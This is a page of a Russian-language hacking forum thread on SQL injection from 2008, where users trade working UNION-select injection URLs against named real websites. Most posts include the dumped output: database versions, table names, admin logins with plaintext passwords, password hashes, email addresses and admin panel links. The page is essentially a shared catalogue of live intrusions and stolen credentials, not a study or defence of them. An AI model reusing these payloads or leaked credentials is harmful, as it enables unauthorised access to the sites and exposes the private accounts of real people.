ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
Страница 450 из 1242 « Первая < 350400440 446 447 448 449 450 451 452 453 454 460500550950 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #4491  
Старый 13.01.2008, 02:58
Listen
Новичок
Регистрация: 13.01.2008
Сообщений: 3
Провел на форуме:
44030

Репутация: 0
Отправить сообщение для Listen с помощью ICQ
По умолчанию
Помогите раскрутить.. короче нашел возможность сделать sql inj
http://beatlive.net.ru/index.php?do=searchнажать расширенный поиск - Поиск по имени пользователя ввести qwerty - поставить галку 'точное имя' и нажать начать поиск - появляется это

Код:
The Error returned was: 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'as score, autor, dle_post.date AS newsdate, dle_post.date AS date, short_story A' at line 1 

Error Number: 
1064 

SELECT id,  as score, autor, dle_post.date AS newsdate, dle_post.date AS date, short_story AS story, dle_post.xfields AS xfields, title, descr, keywords, category, alt_name, comm_num AS comm_in_news, allow_comm, rating, news_read, '' AS output_comms FROM dle_post WHERE dle_post.approve = '1' AND dle_post.autor like 'qwerty' ORDER BY score DESC, date desc LIMIT 0,20
я хоть по адресу обратился?
 

  #4492  
Старый 13.01.2008, 05:31
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию
Код:
http://grabli.net/plug.php?p=horo&sd=0&ed=0&zid=5+union+select+version(),table_name+from+information_schema.columns+where+column_name=0x70617373776f7264/*
Version : 5.0.32-Debian_7etch1/root@localhost/grabli

Код:
users
gateway_pop_accounts
tech
user
probid_admins
probid_users
phpads_affiliates
bhost_admin
bhost_log
bhost_users
bnt_ships
Admins
Profiles
aff
moderators
admin
ftp
ibf_forums
ipb_forums
jos_users
dwm-pop3
dwm-users
osdate_admin
osdate_affiliates
osdate_user
1_alliances
new
top_new
accounts
dle_users
Последний раз редактировалось K1nD[e]R; 13.01.2008 в 05:35..
 

  #4493  
Старый 13.01.2008, 12:36
BizzyD
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175

Репутация: 252
Отправить сообщение для BizzyD с помощью ICQ
По умолчанию
Код:
http://www.lindenbayromance.com/product_details.php?product_id=99999+union+select+1,2,user_name,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+admin/*
root@localhost:lndenbayromance:4.1.22-standard

root:ladybug

admin:newbeginnings


Код:
http://www.iirr.org/bookstore/index.php?product_id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11/*
iirrbookstore@gloria.siteprotect.com:iirrbookstore :4.0.15-standard
Последний раз редактировалось BizzyD; 13.01.2008 в 12:52..
 

  #4494  
Старый 13.01.2008, 20:16
Leone_510
Новичок
Регистрация: 05.01.2008
Сообщений: 23
Провел на форуме:
301392

Репутация: 2
По умолчанию
wow.metrolife.ru

http://wow.metrolife.ru/armory/index.php?act=charsearch

в поиске: abc')+union+select+1,2,3,concat(user,0x3b,password ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33+from+mysql.user/*
 

  #4495  
Старый 13.01.2008, 20:48
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию
http://www.thelearningedge.com.au/
Код:
http://www.thelearningedge.com.au/products.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3A,userid,firstname,lastname,username,userpassword,lastloggedin,type),4,5+FROM+productionwww.ADMIN+LIMIT+0,1/*
Австралия, Google PR 5!
 

  #4496  
Старый 13.01.2008, 20:54
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию
Цитата:
http://www.onlinegooner.com/exclusive/index.php?id=-498+union+select+1,2,3,4,user_password,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7+
from+phpbb_users+limit+1,1/*
5 верстка ...
от админки форума phpbb..
http://www.onlinegooner.com/phpbb2/admin
robburne:arsen10
----------------------------------------------------------------------
Цитата:
http://www.gratuitati.ro/testimoniale.php?ID=-10+union+select+1,2,concat(table_name,0x3a3a3a)+fr om+information_schema.tables/*
5 верстка ...
----------------------------------------------------------------------
Цитата:
http://www.ayaconsult.com/npages/?pid=3&sid=-17+union+select+concat_ws(0x3a,user,version(),0x73 6b794c6162),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+m ysql.user/*
5.0.22
addokufuor:skyLab
сбда не подходит ((
http://www.ayaconsult.com/admin/index.php
 

  #4497  
Старый 13.01.2008, 21:19
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию
Цитата:
Сообщение от 159932  
5.0.22
addokufuor:skyLab
сбда не подходит ((
http://www.ayaconsult.com/admin/index.php
-17+union+select+concat_ws(0x3a,username,password,e mail),2,3,4,5,6,7,8,9,0,11,2,3,14,5,6,7+from+admin users/*
raskorli:ayaconsult12:jonah.akorli@ayaconsult.com
amoako:ayaconsult12:richmond.amoako@ayaconsult.com
 

  #4498  
Старый 13.01.2008, 21:31
A2GIL
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909

Репутация: 200
Отправить сообщение для A2GIL с помощью ICQ
По умолчанию
http://news.mc.duke.edu/news/article.php?id=10200%20and%201=2%20union%20all%20% 20select%201,2,3,4,5,concat(user,char(58),password ,char(58)),7,8%20from%20mysql.user/*

root:623460e26f081bbc
web:761b2fc844890384

Хеши расшифровать не удалось
 

  #4499  
Старый 13.01.2008, 21:33
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
http://www.babwnews.com/article.php?id=-807+union+select+1,2,3,4,5,concat_ws(0x2f,version( ),user(),database()),7,8,9,10,11,12,13,14,15,16/*
4.1.22-standard/babw4_admin@localhost/babw4_A31511
-----------------------------------------------------------------------
http://www.teamfishcake.co.uk/article.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25/*
4.0.27/teamfish_db@localhost/teamfish_site
-----------------------------------------------------------------------
http://www.tayport.org.uk/article.php?id=-75+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5/*
4.1.20/tayportuk@localhost/tayportuk
-----------------------------------------------------------------------
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x2f,versio n(),user(),database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61/*
5.0.45-log/basem_m2007@80.243.178.90/basem_m2007
Все таблицы:
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,table_name,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+ from+information_schema.tables/*
Все колонки:
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,column_name,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 +from+information_schema.columns/*
Есть таблица members
В ней есть полезные колонки:
id
email
password
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,ema il,password),8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60,61+from+members/*
Еще есть таблица poll_user
В ней полезные колонки
user_id
username
userpass
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x2f,user_i d,username,userpass),8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61+from+poll_user/*
1/admin/21232f297a57a5a743894a0e4a801fc3- admin
Админка: http://basem.co.uk/admin/
Но пароль не подходит((
Последний раз редактировалось Tigger; 13.01.2008 в 21:57..
 

  #4500  
Старый 13.01.2008, 22:20
Welemir
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329

Репутация: -2
По умолчанию
Цитата:
Сообщение от A2GIL  
http://news.mc.duke.edu/news/article.php?id=10200%20and%201=2%20union%20all%20% 20select%201,2,3,4,5,concat(user,char(58),password ,char(58)),7,8%20from%20mysql.user/*

root:623460e26f081bbc
web:761b2fc844890384

Хеши расшифровать не удалось

я их уже сто лет как выложил:Р
 
 
Страница 450 из 1242 « Первая < 350400440 446 447 448 449 450 451 452 453 454 460500550950 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ